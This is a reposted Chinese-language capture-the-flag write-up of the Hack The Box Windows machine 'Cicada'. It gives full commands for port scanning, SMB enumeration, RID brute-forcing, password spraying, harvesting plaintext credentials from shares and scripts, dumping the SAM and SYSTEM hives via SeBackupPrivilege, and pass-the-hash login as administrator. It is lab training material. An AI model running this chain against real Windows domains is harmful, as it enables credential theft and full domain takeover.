HTB-Cicada 靶机笔记

news/2025/1/16 5:51:27/文章来源:https://www.cnblogs.com/LINGX5/p/18518267

Cicada 靶机笔记

概述

HTB 的靶机 Cicada 靶机

靶机地址:https://app.hackthebox.com/machines/Cicada

很有意思且简单的 windows 靶机,这台靶机多次利用了信息枚举,利用不同的信息一步一步获得 root 权限

一、nmap 扫描

1)端口扫描

-sT tcp 全连接扫描 --min-rate 以最低速率 10000 扫描 -p- 扫描全端口

nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54435/tcp open  unknown

处理端口

ports=$(grep open ports | awk -F/ '{print $1}' | paste -sd ,)

image-20241031155053584

2)详情探测

-sT tcp 全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描

nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,5443
5 -o details 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-29T15:08:00
|_  start_date: N/A

3) 漏洞脚本扫描

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknownHost script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

二、smb 枚举

1)smbclient

看到目标开放了 445 端口的 smb 服务,先对它进行匿名访问

smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:Sharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareDEV             Disk      HR              Disk      IPC$            IPC       Remote IPCNETLOGON        Disk      Logon server share SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

空密码,看到有共享信息暴露给我们。

只有 HR 磁盘有访问权限,进去看看有没有感兴趣的信息

smbclient  '\\10.10.11.35\HR'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.smb: \> dir.                                   D        0  Thu Mar 14 20:29:09 2024..                                  D        0  Thu Mar 14 20:21:29 2024Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 20244168447 blocks of size 4096. 424297 blocks availablesmb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

看到一个名为 Notice from HR.txt 的文件

查看内容

cat Notice\ from\ HR.txt 
Dear new hire!Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.Your default password is: Cicada$M6Corpb*@Lp#nZp!8To change your password:1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!Best regards,
Cicada Corp

看上去是一封邮件,里面我们后的了一组密码凭证Cicada$M6Corpb*@Lp#nZp!8

不知道用户名,我们用crackmapexec枚举机器的用户名

2)crackmapexec

a)枚举用户名

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\dsad:
SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

从结果中过滤出SidTypeUser的信息来,就是机器的用户

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

b)爆破凭证

把用户放到user文件中,把密码放到pass文件中

crackmapexec smb 10.10.11.35  -u user -p pass --continue-on-success

image-20241031160845584

看到正确的smb凭证信息michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

看看它的共享权限

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --shares

image-20241031161320059

可以看到一个新的共享文件DEV,但这个账户并没有READ权限

同时这个账户也不支持winrm远程管理

image-20241031161135602

c)进一步枚举

利用已知的账户,枚举其他账户信息

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --users

image-20241031161629043

发现了另一组凭证信息david.orelious:aRt$Lp#7t*VQ!3

看以他的smb权限

crackmapexec smb 10.10.11.35  -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

image-20241031161851479

看到这个用户对DEV文件有读权限

用smbclient把它下载下来

smbclient  '\\10.10.11.35\DEV' -U david.orelious   
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir.                                   D        0  Thu Mar 14 20:31:39 2024..                                  D        0  Thu Mar 14 20:21:29 2024Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 20244168447 blocks of size 4096. 423385 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

看到Backup_script.ps1,下载下来

cat Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

有发现了一组凭证emily.oscars:Q!3@Lp#M6b*7t*Vt

验证winrm权限

crackmapexec winrm 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162553666

看到是Pwn3d! 的状态,说明可以登录

三)获得立足点

1)evil-winrm

evil-winrm -i 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162911104

拿到user flag

四)提权

看看当前用户权限

whoami /priv
PRIVILEGES INFORMATION
----------------------Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

看到当前用户有SeBackupPrivilegeSeRestorePrivilege权限,我们可以把sam,system转储出来,破解administrator的hash值,接着利用PTH进行哈希传递攻击,从而获取administrator权限

在c盘下创建一个temp目录

执行

reg save hklm\sam c:\temp\san
reg save hklm\system c:\temp\system

image-20241031163828705

看到转出出来的sam和system

downlaod sam
download system

将文件下载到本地

image-20241031164136779

破解sam

impacket-secretsdump -sam sam -system system local

image-20241031164216197

看到administrator的ntlmhash值2b87e7c93a3e8a0ea4a581937016f341

进行hash传递也就是PTH攻击

evil-winrm -i 10.10.11.35  -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

image-20241031164517084

成功拿到root权限

总结

通过nmap扫描发现目标开放了445 smb服务,对smb进行信息的枚举,发现了一个用户密码,进入获得了一组可以用来进行winrm远程管理的凭证,登陆进去发现用具有SeBackupPrivilege的权限,利用该权限转储hash值,进行PTH攻击,获得了管理员权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/824717.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

云原生开源开发者沙龙丨AI 应用工程化专场杭州站邀您参会

云原生开源开发者沙龙 AI 原生应用架构专场,邀您一起交流,探索 AI 原生应用的工程化落地!云原生开源开发者沙龙 AI 原生应用架构专场,邀您一起交流,探索 AI 原生应用的工程化落地! 活动简介 AI 驱动的应用程序开发、部署和运维,给应用带来了新的生命力和想象空间。但大部…

ACloudGuru-博客中文翻译-一-

ACloudGuru 博客中文翻译(一)原文:ACloudGuru Blog 协议:CC BY-NC-SA 4.0放大管理用户界面:开发人员的 10 个激动人心的特性原文:https://acloudguru.com/blog/engineering/10-exciting-features-of-the-new-amplify-admin-ui本周 AWS 发布了一个主要的新功能——Amplify …

Linux系统调用和库函数的区别是什么

Linux系统调用和库函数是在程序设计中常用的两个概念,具有明显的差异。1、系统调用:是操作系统内核提供的功能接口,用于执行核心操作,如文件管理、进程控制等;2、库函数:是用户空间提供的封装好的函数库,如C库、数学库等。区别主要体现在执行级别、性能、功能和使用场合…

通义灵码知识库问答增强:知识库构建与管理指南

通义灵码能够结合企业知识库的私域数据,生成贴合企业特点的回答。充分发挥检索增强技术的优势,构建高质量的企业知识数据以及合理的知识库权限管理是必不可少的。本文将为您详细介绍如何构造与管理一个高质量的企业知识库。作者:垚佳、汐遥 通义灵码能够结合企业知识库的私域…

[GWCTF 2019]xxor

[GWCTF 2019]xxor 首先可以到汇编界面从新定义(U+P)一下main函数,不然看着会有点乱 分析追踪input变量 可以看到每次循环是获取四字节的输入 但后面对于tmp变量的赋值我就有点看不懂了,不要紧,直接动调 动态调试 连接linux,下断点开调我不知道为什么输入字符会直接跳出循…

快速幂和大数取模的简单运用(以SPOJ LASTDIG - The last digit为例)

题目描述原文Nestor was doing the work of his math class about three days but he is tired of make operations a lot and he should deliver his task tomorrow. His math’s teacher gives him two numbers a and b. The problem consist of finding the last digit of t…

从人员外包到测试工具、测试平台,提供全方位的测试解决方案~

随着学社的学员越来越多,影响力越来越大,不停有学员和企业问我们:能否提供人员外包服务?与此同时,企业对于外包人员的业务技能要求也越来越高,寻找一个稳定靠谱的供应商也成了很多学员所在公司的需求。对此,学社推出了专业的外包解决方案,有这方面的需求的学员和企业可…

Prometheus03 Prometheus服务发现, 各种exporter, 容器化监控, Federation联邦, VictoriaMetrics远程存储

6 服务发现 6.1 服务发现原理 6.2 文件服务发现#准备主机节点列表文件,可以支持yaml格式和json格式 #注意:此文件不建议就地编写生成,可能出现加载一部分的情况 cat targets/prometheus*.yaml - targets:- master1:9100labels:app: prometheus#修改prometheus配置文件自动加…

DRF

1.DRF组件 详细文档:见附件 1.1 Web应用模式 在开发web应用中,有两种应用模式: 1.前后端不分离【客户端看到的内容和所有页面效果都是由服务端提供出来的】2.前后端分离【把前端的界面效果(html,css,js分离到另一个服务端,Python服务端只需要返回数据即可)】 前端形成一…

css_repeating-linear-gradient

在不指定背景颜色渲染区间的情况下, repeating-linear-gradient与linear-gradient的没有区别<div class="test test1"></div> <div class="test test2"></div>.test {width: 150px;height: 150px;border: 1px solid #ccc;display:…

Vue组件化-插槽Slot

认识插槽Slot如何使用插槽slot?插槽的默认内容多个插槽的效果具名插槽的使用◼ 事实上,我们希望达到的效果是插槽对应的显示,这个时候我们就可以使用具名插槽:具名插槽顾名思义就是给插槽起一个名字,<slot> 元素有一个特殊的attribute:name;一个不带name 的sl…